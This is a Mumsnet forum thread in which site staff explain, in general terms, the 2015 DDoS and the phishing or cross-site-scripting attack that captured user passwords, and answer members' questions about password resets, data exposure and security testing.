More about the Technical side of the attacks on Mumsnet

[JustineMumsnet]

Hi all,
There are have been, understandably, a lot of questions about the tech side of the attack on Mumsnet, so here - courtesy of the tech team is some more detail. We obviously do have to be a bit careful with the details because we don't want to give away information that could help other hackers. Whilst it's true that "security through obscurity" isn't real security, we have no wish to make it easier for a future attacker.

We've spent a lot of time since the attacks began, proactively defending against them, minimising the impact of it and protecting against future attacks. With a busy site like Mumsnet there is a lot of information to go through. When we uncover a new snippet of information, perhaps a new suspicious user account, we have to go back to the start and reanalyze, so it can be slow going at times. We are working with our technology partners who have a lot of experience of these kind of attacks and we have used lots of resources available to us.

Some aspects of our technology stack have already been extensively tested by external specialists. Some of our software code is quite old - nearly as old as Mumsnet itself - and things have moved on a lot over that time. However, we have a program of code review whereby all new code is checked by someone other than the person who created it. It's not perfect and everyone makes mistakes, but we take the quality of our code very seriously.

The Denial Of Service (DOS) attack against Mumsnet was a heavy, sustained attack which initially overwhelmed our ability to respond to legitimate requests. Mumsnet might typically get something like 50-100 requests per second. During the attack we were getting around 17,000 requests per second. Each request carried more data than is normal as well.

The hacking attack on our website was separate from the DOS, though we believe perpetrated by the same person or people. We follow many of the industry's best practices, such as using HTTPS for our login pages, keeping our database separate from our cluster of web servers and not accessible from the internet, and so on. We don't necessarily use the same standards of security as say your online banking service might use, for example requiring multiple passwords or using two factor authentication. We try to balance security against usability and the sensitivity of the information we hold. After all, as pointed out by one of you in an earlier thread, the majority of information we have about a user is what that user publishes in Talk, which is there for all to see.

As has been mentioned several times, we keep our passwords encrypted and we use the recommended algorithms for this, with high "strength" settings. This means that if someone somehow obtained the password data from our database they wouldn't be able to make any use of them - they wouldn't work on our site or on any other site even if the user used the same password on that other site. This remains the case even for MNHQ staff; they cannot un-encrypt the passwords either.

We are now pretty confident it was a phishing attack. Phishing, where a hacker gets a user to enter their username and password into a form from which they can capture that information, fits all the data we have. The hacker doesn't need to decrypt anything, because they capture the password in the browser as it is entered (either by typing it, or if it was automatically remembered by the user's browser or password manager). The list of passwords that has been published includes some that users have identified as being ones that they've mistyped. Our database wouldn't have mistyped ones, only accurate ones, whereas those collected by recording what a user submits would and does contain errors.

It's not obvious how it has been conducted though. We have been able to create a proof of concept which shows that it could work, but that relies on some steps that would be difficult or virtually impossible for a hacker. Phishing attacks sometimes use social engineering to "trick" people into using the fake website rather than the real one, but again, for various reasons, we can rule some of these out. Other phishing attacks are more technical and use other means to get people to visit the fake page. One such example is Cross Site Scripting (XSS). XSS is ranked number three on Open Web Application Security Project top ten list of web site security problems. If the hacker can get the website to put his own code on pages which are to be viewed by other users, s/he can modify the page to either redirect the login process to their own site, to a page which looks just like our login page but is actually recording the details and sending them to the hacker. Also possible, but even less likely, is modifying our login page to submit the details to the hacker as well as to us. If the hacker had gained access to our Content Management System he could have done the former, though not the later. However, we record all changes that are made and there are no suspicious ones.

It's impossible for us to know how many users' passwords have been collected. It's a reasonable assumption, and our working one, that the passwords of everybody that has logged since 6th August 2015, and possibly some time before that, have been collected.

In light of the attacks, we've bolstered some aspects of our security, particularly around our administrative functions. We have further changes planned and will be working on these in the coming days.

Forcing everyone to reset their password, as we have done, would render the list useless provided that users don't choose the same new password and they've not used the same username and password elsewhere.

Some users have questioned why certain other changes aren't being made already, such as a move to enforcing stricter passwords, which makes sense. However, given how crucial the part of our system that deals with passwords is, we have to be really cautious when making changes to it so we don't want to rush and end up creating bigger holes but we will certainly take steps to encourage users to strengthen passwords as soon as practicable.

Any questions do post here - we'll answer as transparently as we can - bearing in mind the caveat about helping future hackers mentioned earlier.

It took three years and multiple government agencies internationally to find and convict the hackers who DDOSd PayPal over Wikileaks.

The resource needed to track this person if they are as good as they claim just isn't worth it.

It takes time and effort to find out home addresses. They don't have home addresses of everyone registered. They wouldn't have been able to physically find them in the time which has elapsed. And it's not valuable enough to them to do it. One or two is a scare tactic, more would be risky for them in terms of getting caught.

MI5 exists to thwart terrorism, they don't care about "swatting", it's a police matter.

Love the escalation of the usual MN "call 101!!" though!

Can I ask tech a question please?

Sometimes pages aren't loading properly, and i'm getting a page in just text - I'm guessing this is because it's so busy tonight.

However when I see the plain text page, it shows my e-mail address. Should this be the case? I can't see it when the page loads properly.

It's happened a couple of times, and I took a screen shot last time. Would you like to see this? I don't want to post it on the thread because it shows my e-mail.

Polka I think that will only show because you are logged in. I'm not certain - around 95% sure.

If you mouse over the bit next to the PM notification it says "Hi " or it does for me.

polka that is simply that the website is not loading the CSS file.
The CSS file is the file which formats / lays out the content on the screen / sets colours / sets fonts etc...
It also defines some areas as invisible so that when you click a button the javascript (which runs in your browser) can say 'make it visible' and hey presto you have something that pops down etc.
So if your email address is shown when you hover over the 'My Mumsnet' bit or the envelope top right - then that is why it is suddenly visible with no CSS rules to say make it invisible...

So has anybody joined the IRC chat yet?

MI5

Oh FFS I was logged out just now. Is now a thing? If we are inactive on the site for a particular period we get automatically booted out?

No, they've done another mass forced password change christine - needs ten characters including a number (although the mobile site doesn't tell you that)

they first started hacking on july 14th - they've had plenty of time tbf.

Morning all,

Here's an update of where we are at. The tech team found the hole which was accessed to capture user login data via phishing and patched it yesterday pm. Then, as you probably know, we forced another password update requiring higher-security passwords last night (once we'd rebutted a further DDoS attack).

We are undergoing full security testing by external experts over the next few days to determine if there are any other weaknesses which might be exploited. We'll update you when that process is completed.

Many thanks for your patience and understanding. The best advice remains to update your password here and any passwords used on other sites that are the same as ones you've used on Mumsnet before yesterday.

We're really sorry for the extra bother any anxiety caused.

I haven't been forced to log out. I'm still here under the username I've had published and the password I changed yesterday. Any ideas?

I haven't been forced to log out either.

justine is there any way of getting to reports of dubious posters quickly? There is currently a fairly dubious one on the 3rd hacker thread who has essentially already been called as a troll/jeffrey, although she has put her ahem unique typing down to the fact she is dialectic and has leaning difficulties... IMO posters are on to her, but the fact she is essentially claiming that no-one is safe from hacking of all their accounts isn't helping the current of unease atm.

and here Jeffrey meets Justine.

THROUGH THE HOLE

@wannaBe

justine is there any way of getting to reports of dubious posters quickly? There is currently a fairly dubious one on the 3rd hacker thread who has essentially already been called as a troll/jeffrey, although she has put her ahem unique typing down to the fact she is dialectic and has leaning difficulties... IMO posters are on to her, but the fact she is essentially claiming that no-one is safe from hacking of all their accounts isn't helping the current of unease atm.

thanks - will as community team to look urgently

I'm surprised to hear you're starting security testing now, I assume actually this has been ongoing for some time.

I asked the following earlier

Are the general login problems that have dogged the site for weeks completely separate from this attack? How could you be sure?

Jeffrey was able to modify posts, was this by phishing MNHQ account details?
In this case I think we have established that RebeccaMumsnet was targeted specifically to capture her password via a dodgy link?

Have you reported yourselves to the ICO?

Why is there a need for support for such a wide range of browsers?

@SnakeyMcBadass

I haven't been forced to log out. I'm still here under the username I've had published and the password I changed yesterday. Any ideas?

From what we can see this is a bug effecting about 10% of users. If you haven't been forced to log out please do so yourself and update your password.

@tribpot

I'm surprised to hear you're starting security testing now, I assume actually this has been ongoing for some time.

I asked the following earlier

Are the general login problems that have dogged the site for weeks completely separate from this attack? How could you be sure?

Jeffrey was able to modify posts, was this by phishing MNHQ account details?
In this case I think we have established that RebeccaMumsnet was targeted specifically to capture her password via a dodgy link?

Have you reported yourselves to the ICO?

Why is there a need for support for such a wide range of browsers?

Internal testing has been going on since we've known someone accessed the database - literally night and day - we've been reviewing code across the site. What we are doing now is stress testing via an external firm.

Justine are you able to confirm if they have accessed addresses given through product testing or insight panel or local ed info (I am an old local Ed)

Thanks for the updates Justine.

@tigerscameatnight

Justine are you able to confirm if they have accessed addresses given through product testing or insight panel or local ed info (I am an old local Ed)

Insight data (including product testing) is kept in a different system and protected with a username/password combination which is changed regularly and set by our tech team. We have no reason to think this system was compromised.

Local data is only accessible by individual LEs or admin. Admin access was shut down last week - we don't know for sure what was accessed prior to that but we have no evidence to suggest it was.